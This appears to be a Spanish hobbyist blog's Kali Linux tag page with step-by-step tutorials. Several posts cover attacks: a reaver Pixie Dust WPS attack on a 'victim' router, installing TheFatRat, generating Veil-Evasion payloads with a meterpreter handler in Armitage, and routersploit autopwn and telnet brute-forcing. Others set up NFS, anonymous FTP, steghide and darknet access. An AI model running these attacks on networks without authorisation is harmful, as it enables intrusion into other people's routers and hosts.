Mostrando entradas con la etiqueta Kali Linux. Mostrar todas las entradas
Mostrando entradas con la etiqueta Kali Linux. Mostrar todas las entradas

viernes, 29 de junio de 2018

script para ataque PixieDust para Kali


Hola amigos.

El día de hoy, aprenseremos como instalar un script que realiza el ataque Pixie Dust, destinado a AP que tienen WPS activado y que sean vulnerables a este ataque.

En primer lugar, instalamos las dependencias.

apt-get install build-essential
apt-get install libpcap-dev
apt-get install sqlite3
apt-get install libsqlite3-dev
apt-get install pixiewps
Descargamos
git clone https://github.com/t6x/reaver-wps-fork-t6x.git
Nos metemos en el directorio
cd reaver-wps-fork-t6x/
Nos metemos en el directorio src
cd src/

Y compilamos con la siguiente secuencia:

./configure

make



make install



Ponemos la tarjeta de red en modo monitor:



airmon-ng start wlan0



Buscamos A.P. con WPS activado:



wash -i mon0



la tarjeta en modo monitor puede ser mon0 o wlan0mon, así que si es wlan0mon, ponéis wash -i wlan0mon



Lanzamos el ataque:



reaver -i mon0 -b BSSID_ROUTER_VICTIMA -c CANAL_ROUTER_VICTIMA -vvv -K 1 -f






sábado, 19 de mayo de 2018

nfs en Kali Linux


Hola amigos, hoy, vamos a instalar nfs para Kali Linux. Nfs nos va a proporcionar la capacidad de compartir carpetas y servicios en red.

En primer lugar, instalamos el kernel de nfs:

apt-get install nfs-kernel-server

En segundo lugar, instalamos el cliente:

apt-get install nfs-common

Iniciamos el servidor:

systemctl enable nfs-kernel-server

Creamos la carpeta para compartir

mkdir /srv/nfsroot

Para nfsroot

nfsroot es el árbol de ficheros del servidor.

Editamos /etc/exports



no_root_squash: usará el UID (identificador del usuario) y el GID (identificador del grupo) de cada cliente.
no_subtree_check: Cuando se exporta un subdirectorio, el servidor nfs comprueba si el fichero a compartir esté en el subdirectorio exportado. Con no_subtree_check no lo chequea.
Fsid=0 significa que el directorio exportado actuará como raíz de cara al cliente.
Crossmnt permite que se muestren los subdirectorios del directorio compartido, otra opción es poner nohide en cada una de las carpetas a compartir.

Guardamos y cerramos.

Ponemos:

exportfs -ra

Cada vez que modificamos /etc/exports, debemos actualizar el servidor con exportfs. La opción 'a' es para exportar todo y la opción 'r' además, sincronizará los directorios exportados /etc/exports con /var/lib/nfs/etab y los ficheros que se encuentran en /etc/exports.d

Para el directorio de archivos compartidos

Creamos el directorio nfsshare

mkdir /srv/nfsshare

chmod 777 /srv/nfsshare

Volvemos a editar /etc/exports



exportfs -ra

Montaje nfs

Para montar las carpetas compartidas

mount -t nfs 127.0.0.1:/srv/nfsshare /mnt

Con esto ya estaría.

¿Qué pasaría si estamos en un equipo, que va a ser cliente, y queremos acceder a una carpeta que tiene otro equipo, que sería el servidor?

mount -t nfs IP_SERVIDOR:/nfsshare /mnt

Por supuesto, en lugar de la IP del servidor, puede ser un nombre de dominio.




viernes, 6 de abril de 2018

Instalando The Fat Rat en Kali Linux Moto


Hola amigos.

En esta ocasión, vamos a aprender a instalar TheFatRat en Kali Linux Moto.

En primer lugar, descargamos TheFatRat


En segundo lugar, se abre setup.sh con nano



Buscamos las líneas 506 y 507 con CTRL+W y a continuación CTRL+T



Borramos las siguientes líneas:

echo 'deb http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list
echo 'deb-src http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list
echo 'deb http://old.kali.org/kali sana main non-free contrib' >> /etc/apt/sources.list
echo 'deb-src http://old.kali.org/kali sana main non-free contrib' >> /etc/apt/sources.list



Guardamos con CTRL+O

Salimos con CTRL+X

Instalamos mingw32:

apt-get install mingw32

Cambiamos permisos a setup.sh:

chmod +x setup.sh

./setup.sh







viernes, 23 de marzo de 2018

Servidor ftp en Kali LInux

Este post, está dedicado a Gabriel, el pescaito


Hola amigos.
En esta ocasión, vamos a crear un servidor ftp en nuestro Kali Linux.
La idea de esto es, por si necesitamos en nuestras “investigaciones”.
En primer lugar, ponemos

apt-get install vsftpd

Editamos /etc/vsftpd.conf

Aquí, podemos cambiar la configuración de nuestro servidor.

El parametro listen nos indica si queremos que se inicie al iniciar el sistema. Lo dejaré por defecto, NO.
anonymous_enable indica si queremos que cualquier persona pueda acceder a nuestro servidor como anónimo. Anonimous es una especie de cuenta de ftp que permite que cualquier persona pueda visitar nuestro servidor. En este caso, pondré que sí

anonymous_enable=YES

local_enable nos indica que va a permitir a los usuarios del sistema, loguearse en el servidor. Lo dejaré como está

local_enable=YES

Existen otros parámetros. Leed su descripción y configurarlos según deseeis.



El directorio por defecto al que se accederá es a /srv/ftp/ del servidor. Para cambiarlo, añadimos en el archivo de configuración.

Si queremos un usuario anónimo, en el fichero de configuración añadiríamos:

anon_root=/var/ftp/
no_anon_password=YES


Guardamos y cerramos.

En la terminal, ponemos

mkdir /var/ftp/

Si tenemos el usuario anónimo activado, debemos hacer lo siguiente en la terminal.:

chown nobody:nogroup /srv/ftp


Para iniciar el servidor ponemos

service vsftpd start

viernes, 17 de febrero de 2017

Veil con Armitage

Hola amigos.
Hoy vamos a ver cómo podemos añadir Veil Framework a Armitage.
Para el que no lo sepa, Armitage es una ayuda gráfica a todos nuestros tests de intrusión.
En primer lugar, abrimos una consola y ponemos

service postgresql start

Y luego.

armitage



Le damos a conectar.



Le decimos que sí.




No os preocupéis. Tened paciencia. Pronto se conectará.



Armitage → Scripts → Load



/usr/share/veil-evasion/tools/cortana/veil-evasion.cna




Abrir



Aceptar



Introducimos el path a Veil-Evasion, que será /usr/share/veil-evasion/veil-evasion.py y Aceptar

Armitage nos quedará:



Menú principal → Veil-Evasion → Generate



Configuramos a nuestro gusto, pinchando en las filas de debajo de Values<.



generate



Aceptar.

Para abrir el handler: En la parte de arriba a la derecha: Exploit → Muli → Handler.




Launch



Si picamos con el botón derecho del mouse en el dibujo del equipo víctima, podremos obtener las opciones de meterpreter.

viernes, 3 de febrero de 2017

Cómo entrar en la deep web



Hola amigos.

En esta ocasión, vamos a hablar de la web oculta, o como comúnmente se llama, la deep web, o la red profunda.

En primer lugar, definimos la deep web como aquellas páginas que no son indexadas por los buscadores, entre ellas se pueden encontrar páginas antiguas, de los comienzos de internet, que ya no visita nadie. Los buscadores no los indexan, porque no son interesantes.

Otra parte es nuestro correo electrónico, nuestro portal del banco, etc. Que nunca se podrá acceder a él a través de cualquier buscador.

También, nos podemos encontrar otras subredes, como tor, i2p o freenet.

Para navegar de forma segura, os aconsejo aconsejo descargarse el S.O. booteable Basado en Linux tails, el cual, lo puedes encontrar en https://tails.boum.org/install/download/index.en.html. Es mejor quemarlo en un dvd y botearlo.

Tor

Veremos cómo navegar a través de esta red a través de tails, puesto que ya vimos cómo se instalaba y configuraba tor en el post http://manugomez1977.blogspot.com.es/2016/03/intalando-tor.html, y, para navegar a través de la misma red, configuraríamos el navegador para que pasase por el proxy socks 127.0.0.1:9050.

Las páginas de esta red acaban en .onion, además, la dirección está encriptada.

En cuanto acabe de cargarse el sistema. Se ejecuta automáticamente el explorador.



Hay que conocer las direcciones exactas.

Existe la hidden wiki, cuya dirección es https://zqktlwi4fecvo6ri.onion.to/wiki/Main_Page yque nos ofrece unos directorios con algunas de las páginas.



En algunos países es ilegal entrar aquí, mira a ver si en el tuyo lo es.

Y cuidado dónde entras.

I2p

En primer lugar, vamos a geti2p.net/es/ y nos descargamos el programa.



instalamos con

java -jar i2pinstall_0.9.28.jar










Aceptar







Vamos al directorio /usr/local/i2p

Si queremos usar I2P como root, deberemos editar el archivo i2prouter

Buscamos

#RUN_AS_USER=

Y lo cambiamos por:

RUN_AS_USER=root

Buscamos

#ALLOW_ROOT=true

Y lo cambiamos por:

ALLOW_ROOT=true

Iniciamos I2p

./i2prouter start

E inmediatamente se inicia y se abre el navegador.



Nos vamos a la página de configuración y ponemos el ancho de banda.

Y configuramos el proxy con 127.0.0.1:4444 con http y 127.0.0.1:4445 para https




Hay dos maneras de navegar, a través de nombres de dominio (como siempre) o bien a través de direcciones en base 32 o 64.
En i2p no existen las dns, por ello, se necesita una libreta de direcciones que puede ya estar incluída, la cual relaciona un dominio con su dirección en base 32/64.Si está incluída, no pasa nada, navegaremos igual que siempre. Si no lo está, introduciermos directamente la dirección en base 32 y el propio i2p nos dirá si lo queremos almacenar en la libreta, a lo cual le diremos que sí.



También nos puede pasar algo como esto



Con hacer click a uno de los enlaces de abajo es suficiente.
Freenet

Necesitamos crear un usuario nuevo, por ejemplo, freenet con pass freenet.

Adduser freenet

Cuando pida la contraseña, ponemos freenet.

Salimos del sistema y nos logeamos como freenet.


Lo descargamos de https://freenetproject.org/



Se nos descargará el archivo freenet.jnlp.

Ahora, abrimos el explorador de archivos y hacemos doble click en el programa y se iniciará el instalador (Hay que tener instalado JRE, si no lo tienes instalado, apt-get install default-jre).

En primer lugar, se descarga el programa de instalación



Cuando nos salga



run

Nos sale el instalador.
y como siempre, siguiente siguiente.

Se instalará en /home/freenet/Freenet



Ahora configuramos freenet.

Tenemos tres tipos de seguridad:
  • Seguridad baja: podremos acceder por toda la red.
  • Seguridad alta: solo podremos acceder a una subred de amigos.
  • Personalizada.
Seleccionaremos la baja.

Y vamos configurando lo que nos va pidiendo hasta que, por fin, vemos el directorio de freenet.





Para volver a entrar en freenet, basta con loguearnos con el usuario que hemos creado (freenet) y hacer click en el acceso directo.




Cuidado por dónde navegáis por estas redes. Además, sólo por entrar en la deep web puede ser ilegal en tu país.

viernes, 28 de octubre de 2016

Tutorial steghide

Advertencia: Este post sólo es de carácter informativo. No usar con fines delictivos.

Hola a todos.

Hoy vamos a hacer un poquito de estenografía.

Utilizaremos steghide

para ello instalaremos

apt-get install steghide

Crearemos un archivo de texto



steghide embed -cf -ef texto



Nos pide una contraseña. La ponemos dos veces



El logo, como vemos, no se modifica.



Imaginaos que recibimos la foto y queremos saber si tiene algo escondido, para verlo basta con poner

steghide info logo_Celtas_Cortos.jpg

Darle a Sí y poner la contraseña.




Para extraer el archivo

steghide extract -sf logo_Celtas_Cortos.jpg

y ponemos la contraseña



Por favor:
  • Pincha en la publi.
  • Sígueme en las redes sociales:
    • twitter @manugomez1977
    • instagram @manugomez1977
    • facebook facebook.com/Manugomez1977

viernes, 21 de octubre de 2016

Tutorial routersploit

Hola a todos, hoy os presento routersploit

Routersploit es un framework que nos permite estudiar las vulnerabilidades de routers.

En primer lugar, instalamos

apt-get install routersploit




ejecutamos con

routersploit



Otra opción es descargarlo desde https://github.com/reverse-shell/routersploit.

Para ver los scanners que tiene, tecleamos

use scanner

y no presionamon intro, sino el tabulador.



Yo voy a poner

use scanner/autopwn/

porque mi router no es un dlink



show options



set target IP_OBJETIVO



exploit



Bueno, en mi caso, no es vulnerable a ninguno de los exploits.

Si hubiése sido vulnerable a un determinado exploit, tendría que poner

use exploit_de_la_vulnerabilidad

con use creds obtendremos los distintos módulos, los cuales permiten ataque por fuerza bruta.



Por ejemplo, vamos a usar

use creds/telnet_bruteforce

set target 192.168.1.1

exploit

(Bueno, en realidad, podemos personalizar el diccionario y los threads)



Podemos hacer fuerza bruta con telnet, ssh, ftp, http, snmp.

Happy hacking!!!!!!!!!


Por favor, recuerda que esta información es sólo para aprender, no para cometer actos delictivos. No me hago responsable del mal uso de la información contenida en este blog.

Sígueme en mis redes sociales, twitter @manugomez1977, instagram manugomez1977 y en la Página de facebook Manugomez1977.